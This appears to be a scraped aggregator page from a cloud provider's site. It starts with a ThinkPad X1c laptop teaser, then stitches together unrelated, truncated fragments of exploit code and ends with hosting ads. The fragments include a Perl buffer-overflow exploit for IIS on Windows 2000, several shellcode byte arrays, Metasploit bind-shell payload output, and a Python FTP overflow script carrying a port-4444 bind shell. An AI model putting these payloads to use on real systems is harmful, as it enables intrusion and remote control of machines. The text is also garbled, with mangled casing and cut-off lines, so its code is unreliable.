Read about x1c, The latest news, videos, and discussion topics about x1c from alibabacloud.com
Traditional ThinkPad series notebook main business crowd, leaving a serious, heavy stereotypes, but the 2015-year new ThinkPad X1c broke the traditional thick stereotypes, thin appearance slim fashion, and equipped with the latest five Dynasties Core i7 processor, built-in powerful new central video card. Today's small series will bring you this ThinkPad X1c disassembly diagram, through the demolition machi
:----------------------------------------------------------------------#! /Usr/bin/perl#65514 by isno@xfocus.org# Tested on Win2k SP3 Chinese Version Use IO: socket;If ($ # argv $ Host = @ argv [0];$ Port = 80; $ Ret = "% u00d7 % u00d7" X 500;$ Buf = "A" x 64502;$ JMP = "bbbbbbbbbbbbqq"; # QQ = "/x71/x71" means jno xxxx$ NOP = "/x90" x 40000;$ SC ="/X90/xeb/x03/x5d/xeb/x05/xe8/xf8/xFF/x83/xc5/x15/x90/x90 "."/X90/x8b/xc5/x33/xc9/x66/xb9/x10/x03/x50/X80/x30/x97/X40/xe2/xfa "."/X7e/x8e/x95/x97/x97/
repeat the process):Shellcode trailing add end character 0x90 will shellcode byte-by-bit with 0x44 XOR or cryptographic assembly implementation decoder and extraction machine code decoder machine codes in the Shellcode header decoder eax alignment shellcode start position, Byte-by-bit with 0x44 or decryption, encountering 0x90 stopThe assembler code for the decoder is as follows:void Main () {__asm {add eax,0x14 xor Ecx,ecxdecode_loop:mov BL,[EAX+ECX] XOR bl,0x44 mov [EAX+ECX],BL inc ECX CMP bl
(16.0.2.32)My $ junk3 = "\ x41" x 17000; # Generate exception # Msfpayload windows/exec strongswan calc.exeMy $ shellcode = "\ xb8 \ x2f \ x9e \ xa9 \ x6f \ xdb \ xdc \ xd9 \ x74 \ x24 \ xf4 \ x5a \ x2b \ xc9 \ xb1 "."\ X33 \ x83 \ xea \ xfc \ x31 \ x42 \ x0e \ x03 \ x6d \ x90 \ x4b \ x9a \ x8d \ x44 \ x02 \ x65 \ x6d \ x95 \ x75"."\ Xef \ x88 \ xa4 \ xa7 \ x8b \ xd9 \ x95 \ x77 \ xdf \ x8f \ x15 \ xf3 \ x8d \ x3b \ xad \ x71 \ x1a \ x4c \ x06"."\ X3f \ x7c \ x63 \ x97 \ xf1 \ x40 \ x2f \ x5b \
; RETN 0x10; } return 0;}#include "stdafx.h" int _tmain (int argc, _tchar* argv[]) {char bshellcode[] = {"\x60\x81\xec\x00\x01\x00\x00\xeb\x4e\x4 7\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x45\x78\ X41\x00\x55\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\x45\x78\ X69\x74\x50\x72\x6f\x63\x65\x73\x73\x00\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x00\xe8\x00\x00\x00\ X00\x5b\x64\x8b\x35\x3
As we all know, our MSF contains a DOWNLOAD_HTTPS module.If the SHELLCODE of PAYLOAD is extracted. (Of course, it is better if you have shellcode on the entire platform)Instead, it injects shellcode into a program.The rest from pefile import PEfrom struct import pack# windows/messagebox - 265 bytes# http://www.bkjia.com# ICON=NO, TITLE=W00t!, EXITFUNC=process, VERBOSE=false,# TEXT=Debasish Was Here!sample_shell_code = ("\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +"\x8b\x71\x30\x8b
\ xB5 \ xB4 \ xB3 \ xB2 \ xB1 \ xB0 \ xAF \ xAE \ xAD \ xAC \ xAB \ xAA \ xA9 \ xA8 \ xA7 \ xA6 \ xA5 \ xA4 "."\ XA3 \ xA2 \ xA1 \ xA0 \ x9F \ x9E \ x9D \ x9C \ x9B \ x9A \ x99 \ x98 \ x97 \ x96 \ x95 \ x94 \ x93 \ x92 \ x91 \ x90 \ x8F \ x8E \ x8D \ x8C \ x8B "."\ X8A \ x89 \ x88 \ x87 \ x86 \ x85 \ x84 \ x83 \ x82 \ x81 \ x80 \ x7F \ x7E \ x7D \ x7C \ x7B \ x7A \ x79 \ x78 \ x77 \ x76 \ x75 \ x74 \ x73 \ x72 "."\ X71 \ x6F \ x6E \ x6D \ x6C \ x6B \ x6A \ x69 \ x68 \ x67 \ x66 \ x65 \ x64 \ x6
/shell_bind_tcp EXITFUNC = seh LPORT = 999 R | msfencode-B '\ x40 \ x0A \ x00 \ x0D \ xff \ x0d \ x3d \ x20' The result is a 386-byte payload: [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) buf = "\xba\x2e\x27\xc2\x55\xdb\xdc\xd9\x74\x24\xf4\x5f\x2b\xc9" + "\xb1\x56\x31\x57\x13\x83\xef\xfc\x03\x57\x21\xc5\x37\xa9" + "\xd5\x80\xb8\x52\x25\xf3\x31\xb7\x14\x21\x25\xb3\x04\xf5" + "\x2d\x91\xa4\x7e\x63\x02\x3f\xf2\xac\x25\x88\xb9\x8a\x08" + "\x09\x0c\x13\xc6\xc9\x0e\xef\x15\x1d\
""/Xc9/x66/xcf/x85/X12/x41/xce/xf1/x9b/x99/xd4/xc1/X12/x55/xf3""/X8f/xc8/xca/x66/xcf/xb9/xce/xca/x66/xcf/xbd/xce/xc8/xca/x66/xcf""/Xb1/X12/x49/xf1/xfc/xe1/xfc/x99/xf1/xfa/xf4/XFD/xb7/x10/xFF/xa9""/X1a/x75/XCD/x14/xa5/xbd/xAA/x59/xAA/x50/x1a/x58/x8c/x32/x7b/x64""/X5f/xdd/xbd/x89/xdd/x67/xdd/xbd/xa5/x67/xdd/xbd/Xa4/x10/XCD/xbd""/XD1/x10/XCD/xbd/xd5/x10/XCD/xbd/xc9/x14/xdd/xbd/x89/XCD/xc9/xc8""/Xc8/xc8/xd8/xc8/xd0/xc8/xc8/x66/XeF/xa9/xc8/x66/xcf/x89/X12/x55""/Xf3/x66/x66/xA8/x66/xcf/x95/X12/x51/xce
; Pop ebp; RETN 0x10; } return 0;}#include "stdafx.h" int _tmain (int argc, _tchar* argv[]) {char bshellcode[] = {"\x60\x81\xec\x00\x01\x00\x00\xeb\x4e\x4 7\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x45\x78\ X41\x00\x55\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\x45\x78\ X69\x74\x50\x72\x6f\x63\x65\x73\x73\x00\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x00\xe8\x00\x0
packetwhile True: print S.recvfrom (65565) Run this and root privileges or sudo on Ubuntu: $ sudo python sniffer.py The above sniffer works on the principle that a raw socket are capable of receiving all (for its type, like Af_inet) Incomi NG traffic in Linux. The output could: $ sudo python raw_socket.py ("E \x00x\xcc\xfc\x00\x000\x06j%j}g\x13\xc0\xa8\x01\x06\x01\xbb\ Xa3\xdc\x0b\xbei\xbf\x1af[\x83p\x18\xff\xff\x88\xf6\x00\x00\x17\x03\x01\x00\x1c\x
attack the length of the signature: Min_len = strlen (Hello_sig); 2, the data from the TCP load data, the length of the data and the length of the signature comparison, if the length of the data is less than the length of the attack signature, then the next step is no longer detection; 3, otherwise, this data and signature string matching, if consistent is considered an attack, and then to block or alarm. Next, we analyze the data of NFR IDS record, select Package->query->mssql->mssql Server
" +"\ Xca \ xf0 \ xca \ x60 \ x8b \ x4d \ x07 \ x41 \ xaa \ x4b \ x2a \ xbc \ xf9 \ xdb" +"\ X43 \ x1e \ xbb \ x07 \ x8a \ cross \ xaa \ x5c \ x43 \ x0c \ xd3 \ x09 \ x08 \ x38" +"\ Xe1 \ x8d \ x18 \ x1c \ x20 \ xc4 \ xd0 \ xc7 \ xf3 \ xac \ xc9 \ x9f \ x48 \ xb0" +"\ X81 \ xc7 \ x9f \ x07 \ xc9 \ x9a \ x9a \ x73 \ xf9 \ x8c \ x07 \ x4d \ x07 \ x41" +"\ Xaa \ x4b \ xf0 \ xac \ xde \ x78 \ xcb \ x31 \ x53 \ xb7 \ xb5 \ x68 \ xde \ x6e" +"\ X90 \ xc7 \
/xf1/x9b/x99/xd4/xc1/X12/x55/xf3""/X8f/xc8/xca/x66/xcf/xb9/xce/xca/x66/xcf/xbd/xce/xc8/xca/x66/xcf""/Xb1/X12/x49/xf1/xfc/xe1/xfc/x99/xf1/xfa/xf4/XFD/xb7/x10/xFF/xa9""/X1a/x75/XCD/x14/xa5/xbd/xAA/x59/xAA/x50/x1a/x58/x8c/x32/x7b/x64""/X5f/xdd/xbd/x89/xdd/x67/xdd/xbd/xa5/x67/xdd/xbd/Xa4/x10/XCD/xbd""/XD1/x10/XCD/xbd/xd5/x10/XCD/xbd/xc9/x14/xdd/xbd/x89/XCD/xc9/xc8""/Xc8/xc8/xd8/xc8/xd0/xc8/xc8/x66/XeF/xa9/xc8/x66/xcf/x89/X12/x55""/Xf3/x66/x66/xA8/x66/xcf/x95/X12/x51/xce/x66/xcf/xb5/x66/xcf/x8d""/Xcc
C ++ Code Copy code The Code is as follows: # include # Include unsigned char shellcode [] = "\ xeb \ x54 \ x8b \ x75 \ x3c \ x8b \ x74 \ x35 \ x78 \ x03 \ xf5 \ x56 \ x8b \ x76 \ x20 \ x03 "" \ xf5 \ x33 \ xc9 \ x49 \ x41 \ XAD \ x33 \ XDB \ x36 \ x0f \ xbe \ x14 \ x28 \ x38 \ xf2 \ x74 "" \ x08 \ xc1 \ xcb \ x0d \ x03 \ xda \ X40 \ xeb \ XeF \ x3b \ xdf \ x75 \ xe7 \ x5e \ x8b \ x5e" "\ x24 \ x03 \ xdd \ x66 \ x8b \ x0c \ x4b \ x8b \ x5e \ x1c
C + + code Copy Code code as follows: #include #include unsigned char shellcode[] = "\xeb\x54\x8b\x75\x3c\x8b\x74\x35\x78\x03\xf5\x56\x8b\x76\x20\x03" "\xf5\x33\xc9\x49\x41\xad\x33\xdb\x36\x0f\xbe\x14\x28\x38\xf2\x74" "\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xef\x3b\xdf\x75\xe7\x5e\x8b\x5e" "\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03" "\XC5\XC3\X75\X72\X6C\X6D\X6F\X6E\X2E\X64\X6C\X6C\X00\X43\X3A\X5C" "\x55\x2e\x65\x7
, compression shellcodeThis part will not be elaborated, because I want to follow up back to study. Most of the code involved I can not modify.Describe a small number of steps:"1, get the hash of the API"messageboxa:0x1e380a6aexitprocess:0x4fd18963loadlibrarya:0x0c917432The purpose of obtaining a hash is to shorten the string's comparison length."2, directly loading the code on the book, Run Get Machine code""3, the machine code to the array storage"Char popup_general[]= "\xfc\x68\x6a\x0a\x38\x1
:1391 Payload: \x12\x01\x004\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00 \x01\x02\x00\x1c\x00\x0c\x03\x00 (\x00\x04\xff\x08\x00\x00\xc2\x00 \x00\x00mssqlserver\x00x\x03\x00\x00 The above record contains the time of the attack, the NIDs sessor name of the attack, the destination IP, the destination port, the source IP, and the source port, and we are concerned about payload payload because it is the data that NIDs uses to com
"buf+="\x0f\x58\x58\x5c\xf6\xd5\x0f\x5b\x6b\xca\x34\xdd\x5d"buf+="\xe0\x62\x5a\xc2\xde\x3d\xdc\xb3\xf0\x3e\x78\x31\x90"buf+="\x6c\x5f\x58\xee\x84\xb0\x30\x87\x60\xec\x58\x25\xad"buf+="\x4a\x6b\xc6\xb7\xd8\x70\xb8\x2f\xc8\xd9\xcf\xec\x10"buf+="\xcb\x67\x90\xf2\xdf\xf2\x4a\xf3\x23\xf6\xd1\x12\xa5"buf+="\xfb\x10\xa9\x56\x4e\xd0\xdc\x10\x21\x1d\xb5\x58\x17"buf+="\xe1\x6d\x69\x74\xc7\xac\x58\x1a\xc9\xf7\x00\xf8\x54"buf+="\x76\x05\x6d\xd4\x9e\x9c\x22\xdb\x0f\xa9\xfa\xe3\x8b"buf+="\x8e\x1a\x1f\x60\xdb\
(len (argv )! = 4 ):Print "USAGE: % s host Exit (1)Else:# Store command line argumentsScript, host, fuser, fpass = argv# VarsJunk = '\ x41' * 2011 # overwrite function (ABOR) with garbage/junk charsEspaddress = '\ x59 \ x06 \ xbb \ x76' #76BB0659Nops = '\ x90' * 10Shellcode = (# bind shell | PORT 4444"\ X31 \ xc9 \ xdb \ xcd \ xbb \ xb3 \ x93 \ x96 \ x9d \ xb1 \ x56 \ xd9 \ x74 \ x24 \ xf4""\ X5a \ x31 \ x5a \ x17 \ x83 \ xea \ xfc \ x03 \ x5a \ x13 \ x51 \ x66 \ x6a \ x75 \
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
